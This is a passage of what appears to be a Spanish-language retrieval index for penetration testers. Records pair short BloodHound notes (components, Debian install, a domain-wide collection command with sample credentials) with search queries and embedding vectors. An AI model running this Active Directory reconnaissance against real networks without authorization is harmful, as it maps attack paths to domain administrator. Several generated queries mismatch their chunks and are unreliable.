0.09097, 0.03762, -0.02883, -0.09197, 0.07395, -0.13918, -0.15972, -0.06812, 0.0916, -0.01454, 0.02174, 0.01364, -0.0375, 0.01979, 0.1128, -0.03072, -0.00989, 0.02078, 0.01515, -0.13103, 0.07658, -0.07959, 0.00409, 0.11718, 0.02554, 0.06784, 0.04346, -0.09478, -0.09893, -0.09347, -0.02869, -0.06499, -0.00667, 0.02125, -0.01666, 0.1449, -0.0282, 0.05046, -0.00147, -0.03588, -0.08237, -0.03322, -0.16319, 0.1045, 0.04214, 0.00339, -0.05124, 0.03125, -0.02748, -0.05574, 0.08679, -0.10391, 0.01428, -0.06906, 0.07544, 0.07708, -0.05323, 0.01286, -0.03369, -0.02524, 0.01613, -0.02907, -0.05436, -0.01027, 0.02362, 0.04246, -0.12226, -0.05386, 0.1454, -0.00419, -0.13253, -0.05004, 0.13443, 0.02827, -0.01509, 0.02399, -0.0665, 0.0118, -0.09483, -0.06283, -0.10808, -0.03571, -0.04141, -0.10541, -0.0014, -0.08765, -0.07535, 0.02426, -0.10383, 0.07514, 0.03053, 0.00193, -0.01838, -0.01335, -0.05702, 0.03375, -0.16287, -0.07786, -0.02967, 0.00028, -0.03675, -0.00757, -0.02238, 0.0665, 0.06159, 0.00965, 0.00983, 0.05808, -0.00754, -0.07713, 0.04594, 2e-05, -0.03561, -0.10036, -0.00262, -0.05039, 0.05031, 0.07313, -0.01215, -0.06743, -0.02815, 0.14776, -0.03551, 0.06078, -0.16605, 0.04316, -0.07439, -0.06509, -0.11662, 0.06239, -0.04335, -0.07382, 0.08345, -0.01405, 0.00445, 0.01773, 0.00478, -0.04887, 0.02498, 0.12449, 0.06668, -0.11109, -0.10945, 0.10076, -0.06904, -0.02177, 0.03051, 0.00056, 0.03134, 0.03299, -0.00205, 0.0171, 0.0109, 0.0663, -0.07235, 0.02635, 0.01631, 0.12012, -0.01457, -0.04323, -0.11148, -0.00454, 0.03109, 0.07545, -0.00105, 0.02218, -0.06542, -0.04858, 0.0565, -0.00699, -0.09319, -0.06121, -0.03179, -0.01539, -0.04094, -0.00169, 0.02633, 0.03999, -0.03884, -0.07227, 0.03386, 0.04041, 0.09676, -0.06232, -0.05485, 0.02119, -0.01736, 0.06068, 0.0563, -0.03462, 0.05548, 0.05111, -0.04094, -0.04224, 0.00181, -0.02527, -0.06707, 0.02352, 0.03705, 0.0856, -0.01837, 0.13106, -0.00354, 0.05961, 0.00196, 0.01004, 0.01587, -0.0501, -0.01955, 0.02075, 0.02091, -0.05575, 0.07384, -0.00651, 0.04648, 0.04929, 0.04826, -0.00884, 0.02363, 0.03524, -0.02336, 0.0041, -0.02643, 0.01242, 0.04323, 0.12866, -0.02622, 0.02639, 0.00532, 0.03008, 0.02719, -0.01237, -0.02801, -0.06383, 0.06153, 0.02644, -0.06826, 0.01907, 0.01576, -0.06286, -0.07556, -0.03689, 0.00227, -0.05033, -0.0078, 0.07316, 0.08254, 0.01275, 0.02393, 0.01262]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/mΓ‘quinas, aristas = relaciones. Le preguntas \"ΒΏcamino mΓ‘s corto de juan a Domain Admins?\" y te lo pinta. La ΓΊnica tool con GUI propia.", "indexar": "cual es la herramienta que me ayuda a trazar el camino mΓ‘s corto entre dos usuarios o grupos?", "v": [-0.05735, 0.14605, -0.08491, -0.11989, -0.07057, -0.1351, -0.05506, 0.07669, -0.03135, -0.11263, -0.07645, -0.10265, 0.00615, -0.00221, 0.09576, -0.10497, 0.11124, 0.00126, 0.0634, 0.01344, -0.03083, -0.0733, 0.00889, 0.00322, -0.13997, -0.05859, 0.05374, -0.04617, -0.13784, 0.08358, 0.04167, -0.0201, 0.00227, -0.07496, -0.08339, -0.11975, 0.06667, 0.10837, -0.05507, 0.12321, -0.15041, -0.04061, -0.07973, -0.02416, -0.00109, -0.00097, -0.15654, 0.0482, 0.05478, 0.00178, -0.07069, -0.05844, -0.09829, -0.00203, -0.08854, -0.15414, 0.19913, -0.12857, 0.00464, -0.11768, -0.10579, -0.00978, -0.03272, -0.00132, 0.06619, -0.04854, 0.05179, -0.05198, -0.12608, 0.07085, -0.01124, 0.04898, 0.04792, -0.05098, -0.01489, 0.04166, 0.0211, 0.04382, 0.04537, -0.00044, 0.1911, 0.01489, 0.02384, -0.0341, -0.03675, -0.07709, 0.11526, 0.00782, 0.05111, -0.09437, 0.00606, 0.06093, 0.05013, -0.00544, 0.01011, 0.03517, -0.00471, -0.05322, 0.05248, -0.03494, 0.12536, -0.08147, -0.08704, 0.05027, 0.06565, 0.07863, -0.00247, -0.0335, -0.15204, 0.03969, 0.03605, 0.03266, 0.08589, 0.00298, 0.02551, 0.03633, -0.06923, -0.03178, 0.016, -0.15202, 0.02453, 0.00241, -0.1392, -0.01282, 0.02159, 0.02073, 0.02447, 0.05129, -0.00038, -0.07005, -0.01796, -0.04406, -0.07086, -0.04735, -0.08152, -0.03991, -0.02713, -0.06541, 0.01035, 0.02002, 0.07279, 0.006, -0.05971, -0.16675, 0.04464, -0.01668, -0.01503, -0.07631, -0.01707, 0.05267, -0.00243, 0.0278, -0.01966, 0.00395, -0.02738, 0.01965, -0.06407, 0.01081, -0.07218, 0.01937, -0.06433, -0.05139, 0.08291, -0.04803, -0.01412, -0.04235, -0.01667, 0.00046, 0.04263, 0.03575, 0.03629, -0.02981, 0.07193, 0.00687, 0.04876, -0.06583, -0.0597, 0.00666, 0.01846, 0.03304, -0.03461, -0.02362, 0.00133, 0.0165, -0.0112, -0.05361, -0.02394, 0.04109, 0.06078, 0.06392, -0.07076, 0.04538, 0.0253, -0.07935, -0.04085, -0.02365, 0.01634, -0.06549, 0.05786, -0.02499, -0.03432, -0.0626, -0.03602, -0.00791, 0.01495, 0.02475, -0.04746, 0.0275, 0.05626, 0.04409, 0.07333, -0.0201, 0.00945, -0.01359, 0.01182, -0.06578, 0.00052, -0.00459, -0.04064, 0.02596, 0.0009, 0.06168, 0.06499, -0.02239, -0.01197, 0.03281, 0.02199, -0.0229, -0.06952, 0.00266, -0.01417, -0.05506, -0.02797, -0.05658, 0.07917, -0.01611, 0.03781, -0.00323, -0.0374, -0.0242, 0.0322, 0.1001, 0.03041, -0.04131, -0.02113, -0.00805, -0.05364, -0.01858, -0.07871, -0.07043, -0.01849, 0.01408, 0.07361, -0.03683, 0.06428, -0.04573]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Componentes\n```\nSharpHound (.exe en vΓ­ctima) o bloodhound-python (en Kali) β†’ JSON\nJSON β†’ BloodHound GUI (en Kali) + Neo4j (la BD del grafo)\n```", "indexar": "que programa sirve para visualizar el grafo de relaciones Active Directory", "v": [-0.1114, 0.0895, -0.10434, -0.31379, 0.0668, -0.10585, -0.00914, -0.02553, 0.02881, 0.00707, 0.15238, -0.14985, -0.11674, -0.08897, 0.14371, 0.03441, 0.11595, -0.12306, -0.03792, 0.01531, -0.00636, 0.08867, 0.01916, -0.06198, -0.05634, 0.00401, 0.00665, -0.08916, 0.05863, 0.04962, 0.08315, -0.01941, 0.05065, -0.17065, -0.01581, -0.0452, 0.00095, 0.00665, 0.06526, 0.03, -0.07924, -0.07574, -0.06991, 0.03912, 0.0656, 0.01974, -0.02018, -0.06194, -0.04498, 0.10046, -0.06655, -0.03002, -0.04553, 0.02135, 0.05229, -0.05882, -0.0513, -0.14833, -0.03875, -0.04818, 0.03147, -0.05302, 0.03414, -0.12229, -0.04763, -0.03139, 0.16675, 0.00995, -0.06922, 0.0166, -0.03593, 0.04171, -0.01523, 0.09543, 0.01876, 0.01249, 0.01519, -0.03513, -0.04226, 0.00362, 0.04641, 0.02079, -0.0029, 0.12283, -0.1362, -0.03223, 0.02186, 0.00844, -0.00269, -0.00454, 0.03813, 0.11687, -0.08365, 0.04424, 0.10674, 0.04904, 0.01691, 2e-05, 0.11749, 0.01164, 0.11235, -0.04743, -0.08429, 0.03699, -0.05493, 0.06319, 0.02098, 0.10882, -0.08326, 0.16035, 0.04521, 0.0167, 0.00224, -0.04411, -0.03457, 0.06977, -0.03418, -0.02209, 0.02821, -0.06195, -0.13412, -0.00193, 0.04018, 0.08007, -0.04382, 0.00263, 0.01296, 0.09848, -0.0055, 0.13944, -0.03566, 0.06959, -0.04086, -0.11313, -0.08051, -0.09751, 0.02864, 0.0445, 0.0355, -0.1143, 0.0041, 0.03849, 0.05694, 0.01167, -0.0053, 0.02669, 0.06717, 0.00614, -0.00814, 0.01684, -0.00604, -0.01955, -0.00207, 0.00896, 0.03318, -0.0351, -0.02682, -0.01515, -0.02856, 0.00047, -0.03895, -0.02349, 0.04737, 0.00307, 0.05948, -0.00049, -0.12739, 0.04076, 0.05857, 0.12121, -0.00555, 0.08644, -0.00078, -0.10065, -0.01511, -0.01125, 0.02937, -0.0501, -0.01408, 0.00992, -0.00097, 0.00791, 0.02305, 0.07036, -0.03626, -0.01641, -0.00788, -0.02336, 0.0524, -0.04771, -0.02361, 0.03513, -0.05463, -0.00076, 0.00662, -0.08251, 0.01144, 0.01766, 0.00851, -0.02845, 0.04238, -0.03882, 0.07061, -0.01973, 0.04991, 0.11377, -0.01679, 0.02173, 0.06472, 0.04394, -0.06518, 0.02548, 0.03641, 0.04783, -0.07686, -0.03412, 0.01501, 0.04518, 0.08867, 0.01584, -0.00487, -0.01667, 0.00203, -0.03373, 0.05186, -0.06669, 0.00384, 0.00527, 0.01766, -0.02392, -0.01128, -0.01575, 0.01933, -0.03527, 0.03169, -0.01909, 0.00959, -0.08788, -0.00617, -0.10159, 0.05318, 0.03538, 0.00549, 0.01621, -0.07178, -0.02516, -0.01241, -0.00518, 0.02707, -0.03744, -0.00481, 0.02911, 0.04343, -0.00211, 0.0139, 0.03286]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Componentes\n```\nSharpHound (.exe en vΓ­ctima) o bloodhound-python (en Kali) β†’ JSON\nJSON β†’ BloodHound GUI (en Kali) + Neo4j (la BD del grafo)\n```", "indexar": "con quΓ© herramienta puedo exportar los datos de la victimΓ­a en formato JSON", "v": [-0.0606, 0.04352, -0.08631, -0.17034, -0.01432, -0.13474, -0.03597, -0.05541, -0.06426, -0.02701, -0.05778, -0.13035, 0.0407, 0.00254, 0.01473, 0.02997, 0.2171, -0.09725, -0.03374, 0.00666, -0.03996, 0.00031, -0.00981, -0.13612, -0.08205, 0.08574, 0.02517, 0.06244, -0.18751, 0.16455, 0.04066, -0.04267, 0.0315, -0.03628, -0.03002, 0.0221, 0.02558, 0.13971, -0.08725, 0.08411, 0.15438, 0.00691, -0.04504, 0.03201, -0.00627, 0.0856, -0.13294, 0.06537, -0.02831, 0.03603, 0.00507, -0.09606, -0.1591, -0.01027, 0.03096, -0.12432, 0.1105, -0.12049, 0.0941, -0.01439, -0.04709, 0.01088, -0.02473, -0.08808, 0.02842, -0.06588, 0.05724, -0.05527, -0.05858, 0.06251, 0.03536, -0.00187, 0.0188, -0.07558, -0.01648, -0.09906, -0.01375, 0.07254, 0.02353, -0.00383, 0.00246, -0.02485, -0.06825, 0.07161, -0.03874, 0.05471, 0.09362, 0.00502, -0.02485, -0.14128, 0.05561, -0.04117, 0.03412, -0.04254, 0.04153, -0.04581, 0.064, -0.09147, -0.03927, -0.07093, 0.04412, 0.05142, -0.06573, 0.09225, 0.0623, -0.02183, -0.02144, -0.00655, -0.10562, 0.06071, -0.01403, 0.09736, -0.00238, 0.00483, -0.04077, -0.04901, -0.01668, -0.05846, -0.02529, 0.021, 0.07582, -0.02366, 0.03646, -0.0492, 0.02851, -0.01543, -0.09316, 0.0853, -0.06015, -0.04628, -0.01532, 0.01112, -0.04592, 0.03979, 0.10227, 0.05776, 0.00332, -0.11612, 0.04476, -0.06325, -0.019, 0.01563, -0.05032, -0.06801, 0.02501, -0.09999, 0.07037, 0.05795, -0.09373, -0.05007, 0.0915, -0.0283, 0.03822, -0.00195, -0.06798, -0.02334, 0.01895, 0.00662, -0.03415, 0.06022, -0.04811, 0.03918, 0.01595, 0.01281, 0.02541, -0.05693, 0.084, -0.04997, 0.13143, 0.04518, 0.01398, 0.00574, 0.08345, -0.01901, 0.03897, -0.08452, -0.06902, -0.07624, -0.03926, -0.07084, -0.01026, -0.02825, -0.02588, -0.04243, -0.02425, -0.07831, 0.00619, -0.05056, -0.00549, -0.03047, 0.01869, 0.14039, 0.0653, -0.0867, 0.0194, -0.04397, -0.02203, 0.03537, 0.03886, -0.00811, -0.09067, -0.03688, 0.0413, -0.02948, 0.00786, 0.11668, -0.05764, -0.0177, -0.02313, -0.01142, 0.01087, 0.01633, 0.03236, -0.06316, -0.03947, -0.02368, -0.01256, 0.01164, 0.02124, -0.00982, -0.033, 0.05364, 0.09488, -0.03699, -0.02554, 0.04497, 0.03757, 0.01825, -0.02318, -0.01357, 0.01588, 0.05367, -0.05319, -0.01673, 0.04601, -0.07212, -0.01417, -0.04308, -0.07115, -0.01087, 0.00785, 0.02356, -0.00594, -0.02046, -0.02352, -0.02415, -0.03975, 0.05472, 0.04156, -0.11767, -0.05972, 0.05966, 0.11313, -0.03593, 0.01763, -0.06608]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Componentes\n```\nSharpHound (.exe en vΓ­ctima) o bloodhound-python (en Kali) β†’ JSON\nJSON β†’ BloodHound GUI (en Kali) + Neo4j (la BD del grafo)\n```", "indexar": "cual es una alternativa libre a SharpHound o bloodhound-python", "v": [-0.17564, -0.11826, 0.0051, -0.00744, -0.10037, -0.08852, -0.08041, -0.12892, -0.06241, 0.03007, -0.02254, -0.09156, 0.04376, 0.04213, -0.07956, -0.04747, -0.10471, -0.06521, 0.08535, 0.02146, -0.11097, 0.0547, -0.15593, -0.06743, -0.03913, -0.04452, 0.02008, 0.17308, -0.1384, 0.05117, 0.02465, 0.01645, 0.04082, 0.13466, -0.14344, -0.02055, 0.09491, 0.13567, 0.03446, 0.12699, -0.06776, -0.08198, 0.01484, -0.0632, 0.02456, -0.00546, -0.06388, 0.158, 0.02569, 0.11406, -0.0336, 0.08939, -0.19509, -0.10308, 0.06882, 0.04462, 0.08173, -0.09767, 0.01582, -0.06448, -0.08344, -0.02856, 0.05437, -0.0452, 0.05219, -0.02995, -0.01796, -0.0496, -0.047, 0.13194, -0.03418, 0.02284, -0.01189, 0.02936, -0.06974, -0.01339, -0.14021, -0.06229, 0.03141, 0.06553, -0.03379, -0.11016, -0.03546, 0.03209, -0.07891, -0.13388, 0.13772, -0.01387, 0.11397, 0.10649, 0.03355, 0.05001, -0.01901, 0.13074, 0.00732, -0.04522, 0.00666, 0.03239, 0.05506, 0.01762, 0.06299, 0.04779, -0.11551, 0.0458, 0.01969, 7e-05, -0.05914, 0.08225, -0.08446, -0.02685, 0.02608, 0.01782, -0.05624, 0.04363, -0.03715, -0.13197, 0.05442, 0.1185, 0.00826, 0.03049, -0.04141, 0.0278, -0.03236, -0.01753, -0.02622, 0.03813, 0.02725, 0.04815, -0.07004, 0.07603, -0.06007, 0.06734, -0.0708, -0.1263, -0.11117, 0.03934, 0.0332, -0.02714, 0.11389, -0.03917, -0.07751, 0.00485, 0.05587, 0.01547, -0.01098, -0.04732, -0.01402, -0.04715, -0.00788, 0.01072, -0.0326, 0.01706, 0.04333, 0.06929, -0.01856, -0.00495, -0.04308, 0.00163, -0.06351, 0.036, -0.00397, -0.03795, -0.00675, -0.02003, -0.03427, 0.08404, -0.05809, 0.00731, -0.0329, -0.05978, -0.00688, 0.02434, 0.02849, 0.01223, 0.02293, -0.08225, 0.03576, -0.1031, -0.03485, 0.01198, 0.06756, 0.02661, -0.12409, 0.00913, 0.08368, -0.00158, 0.02993, 0.04858, 0.02248, -0.02451, -0.02853, 0.07191, 0.02349, -0.06561, -0.05137, 0.00927, 0.04485, -0.04826, 0.03877, -0.03394, -0.00412, -0.01547, -0.04942, 0.01642, 0.03506, 0.04155, -0.05786, 0.02537, -0.04501, 0.0307, 0.01223, 0.00729, 0.04571, 0.05099, -0.01174, 0.00208, 0.01946, -0.00206, -0.03948, -0.00294, 0.03185, -0.02287, 0.02531, 0.07184, -0.07319, 0.02116, 0.05109, -0.00056, 0.04341, -0.03426, -0.0059, 0.04979, -0.03284, 0.03134, -0.03934, 0.04112, 0.04015, 0.04033, 0.01925, -0.01079, 0.05229, 0.05693, -0.02537, -0.03892, -0.01944, -0.00737, 0.00751, -0.02771, -0.02149, -0.01517, -0.04035, 0.02165, -0.00182, 0.00217, 0.02977, 0.017]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## InstalaciΓ³n (Debian)\n```bash\nsudo apt install -y bloodhound bloodhound.py neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "quΓ© programa puedo usar para rastrear conexiones de redes sociales en Linux", "v": [0.046, 0.04433, -0.1285, -0.22622, -0.00544, -0.08993, -0.16442, -0.04085, -0.05494, -0.02453, -0.06565, -0.13418, -0.03943, -0.09543, 0.07277, -0.01376, 0.00258, -0.00443, 0.0843, -0.15772, -0.06959, 0.01873, -0.17676, -0.06535, 0.04999, 0.03203, 0.11935, -0.15353, 0.01071, 0.03198, -0.13237, 0.01089, 0.06416, 0.07482, -0.11624, 0.07377, 0.08961, 0.09776, 0.08296, 0.02934, 0.1053, -0.03718, -0.05752, 0.00306, 0.00618, -0.0502, -0.02347, -0.14682, -0.03993, -0.0792, -0.02295, 0.00719, -0.14671, -0.03442, -0.00791, -0.04682, 0.09081, -0.1676, -0.07097, 0.04842, -0.10703, -0.0306, 0.00051, 0.00799, 0.00621, -0.07158, 0.00705, 0.03027, -0.1606, 0.09236, 0.02771, 0.15363, -0.00318, 0.01314, 0.07703, 0.1331, -0.05564, 0.04053, 0.04361, 0.02899, -0.03018, -0.01716, 0.02733, 0.04076, -0.10541, -0.03603, 0.07543, -0.06339, -0.02811, -0.01529, 0.01291, 0.04961, -0.03877, 0.0196, 0.09372, 0.02429, 0.06307, 0.02735, 0.00889, -0.02966, -0.06009, -0.00741, -0.10076, 0.11063, -0.05877, -0.02834, 0.0211, -0.02904, 0.00988, -0.05822, 0.08407, -0.05488, -0.03163, -0.02552, -0.09558, 0.01014, -0.09694, 0.03808, 0.02109, -0.06209, -0.02369, -0.00319, 0.00956, -0.01767, 0.08012, 0.05451, -0.04634, 0.2085, -0.03986, -0.0251, 0.01198, -0.07426, -0.01757, -0.06741, -0.04681, -0.02489, -0.00198, -0.14023, -0.01611, -0.08824, 0.00226, 0.01815, -0.02197, -0.03304, 0.0559, 0.05241, 0.03876, -0.11462, -0.0286, -0.00398, -0.00536, 0.03769, -0.04157, -0.03016, -0.05151, 0.00164, -0.0069, -0.01848, -0.04696, -0.03274, -0.03349, -0.06239, -0.01107, -0.06023, 0.03514, 0.01988, -0.02966, 0.05731, 0.04612, 0.06018, -0.00213, 0.1104, 0.00752, -0.06252, 0.02302, -0.05315, 0.00666, -0.05929, -0.00308, 0.02284, -0.08263, -0.00637, 0.07868, -0.04296, 0.05554, 0.01346, -0.0863, 0.07907, -0.00769, 0.05465, -0.0337, -0.00492, 0.03764, 0.04303, 0.02895, -0.03236, 0.02165, -0.01797, 0.058, -0.03869, -0.0685, 0.00318, -0.03424, 0.01797, 0.02769, 0.04166, -0.04006, -0.04456, 0.03014, 0.07631, 0.02208, -0.05229, 0.04151, -0.0073, -0.02624, 0.00197, 0.0307, 0.00985, 0.0639, 0.03827, -0.00537, 0.01091, 0.0175, 0.06293, 0.05883, -0.06015, -0.03993, -0.02541, -0.02387, -0.03046, 0.05043, -0.06209, -0.02574, -0.01826, -0.00729, -0.06881, -0.01873, 0.01311, -0.0011, -0.00154, -0.05189, 0.0597, 0.02335, 0.00125, -0.05033, -0.03114, -0.1059, 0.03336, -0.02125, -0.05902, 2e-05, 0.01338, 0.07675, -0.02166, -0.00819, 0.05181]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## InstalaciΓ³n (Debian)\n```bash\nsudo apt install -y bloodhound bloodhound.py neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "cΓ³mo instalar un anΓ‘lisis de grafos social que funcione en Debian", "v": [-0.11656, 0.08581, -0.17496, -0.11088, 0.06015, -0.17141, -0.07042, -0.09132, -0.07508, 0.03411, -0.01171, -0.09446, -0.13854, 0.00724, 0.12763, -0.0646, -0.00412, -0.13649, -0.0508, -0.01503, -0.1328, 0.00052, -0.05123, -0.06146, -0.13247, -0.04419, -0.00978, -0.11586, -0.11955, 0.05298, 0.09514, -0.04842, 0.09405, -0.17042, -0.09841, -0.07725, -0.04603, -0.06803, 0.08236, 0.06561, -0.01265, -0.14048, -0.03397, 0.07149, -0.06097, -0.07309, -0.03824, -0.09115, -0.07445, 0.01753, -0.00926, -0.0254, -0.01723, 0.01778, -0.10204, -0.07265, 0.05596, -0.17934, 0.02956, 0.03162, -0.06072, 0.15913, -0.05827, 0.073, 0.08833, -0.0314, -0.0307, 0.05774, -0.02342, 0.0465, -0.02061, 0.10943, -0.12431, 0.02025, 0.06075, 0.10023, -0.07715, 0.01365, 0.03015, 0.03629, 0.03768, -0.02635, -0.09325, 0.0529, -0.16805, -0.02322, 0.01018, 0.02821, -0.06583, -0.01227, -0.05475, -0.08839, -0.09995, 0.00334, 0.03994, -6e-05, 0.03669, -0.00613, 0.0495, -0.05551, 0.04744, -0.0528, -0.03477, 0.01545, 0.01952, -0.06838, 0.0022, -0.00161, -0.02598, -0.04881, 0.09924, 0.00334, -0.07118, -0.00759, -0.09453, -0.00223, -0.02298, 0.06666, -0.05499, -0.02115, -0.07885, 0.05108, -0.02214, -0.05737, -0.08305, -0.0002, 0.03172, 0.12293, 0.07347, 0.04901, -0.02783, 0.01526, -0.00935, -0.0092, -0.12623, 0.05081, -0.01404, -0.00654, -0.09242, -0.09112, 0.01017, 0.08767, 0.05075, -0.01459, 0.05071, 0.09778, 0.00854, -0.0464, -0.07217, 0.01574, 0.03969, 0.02282, -0.02884, 0.01429, -0.0031, -0.06587, 0.01662, -0.05518, 0.03386, -0.00695, -0.02025, -0.03563, 0.04177, 0.00782, -0.07306, -0.00042, -0.03367, 0.02907, 0.06042, -0.01228, -0.04287, 0.05092, 0.01569, -0.05498, 0.11519, -0.04022, -0.09244, -0.05273, 0.00226, -0.00456, -0.06236, 0.05928, 0.07641, -0.01961, 0.02456, -0.01687, -0.02789, -0.04957, 0.02383, 0.02229, 0.03789, -0.04885, -0.091, 0.04829, 0.05567, -0.06136, 0.02, -0.02576, -0.01725, -0.05478, -0.05687, 0.01332, -0.03553, -0.01636, 0.06148, 0.05899, 0.00227, -0.00356, -0.00123, 0.04495, 0.08284, -0.00106, 0.04417, -0.01959, -0.02012, -0.02497, 0.04444, -0.06687, 0.0697, 0.0336, 0.01844, 0.01368, 0.03658, 0.01544, -0.03866, -0.04421, -0.00959, 0.01501, 0.04667, -0.01314, 0.00687, 0.10367, -0.01534, 0.00234, 0.04247, -0.01617, 0.02582, -0.01271, -0.06321, -0.035, 0.09833, 0.07749, 0.03474, 0.0042, -0.02816, -0.09181, -0.05391, -0.00936, 0.03769, -0.08105, -0.02628, 0.02429, 0.06173, -0.00874, 0.02719, 0.00525]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# 1) recolectar desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "que herramienta sirve para recolectar credenciales de un dominio local?", "v": [-0.09447, -0.07336, -0.23357, -0.11946, 0.11151, -0.11587, 0.09767, 0.05103, -0.03791, -0.11064, -0.1386, -0.03806, 0.0487, -0.26543, 0.17589, 0.04093, 0.08223, -0.06259, -0.06582, -0.06943, -0.12636, -0.07514, -0.02293, 0.02584, 0.02674, -0.0259, 0.02223, -0.0629, -0.02937, 0.17143, 0.08886, 0.00156, -0.02428, -0.03791, -0.0355, -0.03923, -0.03953, 0.08241, -0.04406, 0.04433, -0.02286, -0.00533, -0.17478, 0.04472, -0.02869, 0.04787, -0.11257, -0.05222, -0.07985, 0.00063, -0.08094, -0.19389, -0.13462, -0.04676, 0.01759, -0.01896, 0.08027, -0.12723, 0.04453, -0.08098, -0.12015, -0.06248, -0.08037, 0.00796, -0.00458, -0.09274, -0.01665, -0.04099, -0.01423, 0.00248, -0.01282, 0.01268, 0.14197, -0.03923, 0.01502, -0.06533, 0.05562, 0.0041, 0.13877, -0.05911, 0.13695, -0.02793, -0.035, -0.02983, -0.03576, -0.08652, 0.04626, -0.12679, 0.11178, -0.02349, 0.02121, 0.06966, -0.0205, -0.00499, -0.00355, -0.02302, 0.05243, -0.07111, -0.02112, 0.00922, 0.13648, -0.05059, -0.05158, 0.06052, 0.07226, 0.06147, 0.00744, -0.00998, -0.02682, -0.00996, 0.06771, -0.01167, -0.04411, 0.04353, -0.03523, 0.10365, -0.05689, 0.02905, 0.03495, -0.06486, 0.0592, -0.07769, 0.01546, -0.03464, -0.03872, 0.0068, -0.07986, -0.04521, 0.02307, -0.13011, -0.00955, -0.00368, -0.02462, 0.01632, 0.01554, -0.02018, 0.07365, -0.12645, -0.09663, 0.01042, 0.01488, 0.02136, -0.07081, -0.08135, 0.03981, -0.0282, 0.02618, -0.08012, 0.0307, -0.06046, 0.02747, -0.00076, -0.00169, 0.03049, -0.02107, 0.08828, -0.039, 0.02776, -0.03443, 0.01852, -0.03274, -0.07385, 0.04576, 0.02451, -0.03235, -0.0662, 0.04268, -0.00905, 0.09441, 0.04949, -0.01514, 0.02303, -0.04159, -0.02944, -0.00715, -0.02666, -0.0065, -0.02535, 0.0205, -0.06985, -0.01337, -0.04174, -0.02065, 0.04364, 0.00764, 0.03604, 0.01315, -0.04036, -0.02392, 0.03574, 0.02286, -0.00086, -0.04316, -0.00273, 0.02114, 0.00035, 0.00906, -0.00609, 0.03896, 0.05117, -0.09378, -0.04772, -0.03666, 0.01479, 0.01569, 0.08834, -0.00029, -0.02474, -0.00244, 0.03388, -0.02978, -0.00529, 0.02919, -0.01906, -0.00122, -0.06752, 0.00123, 0.00044, -0.07603, -0.0337, 0.01505, -0.01235, 0.02746, -0.00685, -0.00415, 0.03109, 0.05584, -0.01679, 0.0589, 0.0206, 0.00082, 0.00744, -0.02305, -0.00763, 0.01382, -0.03312, 0.06214, 0.0205, -0.02239, -0.05977, -0.03461, 0.02127, -0.00189, -0.03727, -0.09257, -0.05355, -0.06253, 5e-05, 0.00625, -0.02691, -0.01626, -0.01083, 0.08747, 0.00635, 0.02751, 0.00658]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# 1) recolectar desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "cΓ³mo puedo extraer informaciΓ³n de usuarios desde una mΓ‘quina Linux?", "v": [-0.08256, 0.13112, -0.05018, -0.1478, -0.06023, -0.15072, -0.22371, 0.02816, -0.15837, -0.05697, -0.05631, -0.10406, 0.08813, -0.06196, 0.05988, -0.13935, 0.0057, -0.06503, 0.01362, -0.10404, -0.08017, 0.07213, -0.17546, -0.0074, 0.02474, 0.0861, -0.00244, -0.16019, -0.06552, 0.09364, -0.11337, 0.02517, -0.00791, 0.04693, -0.04936, 0.04998, 0.06867, 0.06078, 0.12808, 0.09007, 0.11362, -0.05066, -0.03361, 0.00259, 0.04086, -0.11081, 0.05241, -0.08697, 0.08885, -0.10498, 0.03545, -0.05775, -0.06932, 0.00439, -0.00685, -0.08185, 0.20165, -0.10639, 0.09176, -0.00472, -0.05835, 0.02705, -0.0667, 0.05375, -0.02096, 0.02788, -0.00691, -0.03314, -0.10502, 0.04415, -0.03295, 0.10444, -0.01703, -0.03237, 0.04084, 0.03264, -0.02846, 0.0398, 0.03758, -0.02243, -0.00167, -0.00142, -0.00017, -0.04735, -0.07615, -0.1089, 0.08188, 0.01326, -0.01271, -0.03485, 0.10771, 0.08127, 0.04993, 0.02354, 0.13182, 0.0073, 0.09778, 0.03954, 0.00151, -0.02016, -0.02477, 0.05278, -0.03541, 0.1442, -0.0005, 0.02009, 0.07279, -0.0525, -0.02511, -0.12506, 0.02708, -0.05268, -0.00868, -0.02856, -0.09482, -0.01976, -0.07016, 0.03444, -0.05693, 0.00773, -0.03624, -0.00055, 0.06787, -0.09199, 0.01012, -0.03146, -0.00653, 0.13889, -0.07734, -0.15086, 0.05231, -0.05796, -0.00046, 0.07746, 0.022, 0.04966, 0.01715, -0.11771, -0.03913, -0.0517, 0.01692, 0.03872, -0.06928, 0.00132, 0.07429, -0.0727, 0.03203, -0.08757, -0.03847, -0.10498, 0.05299, 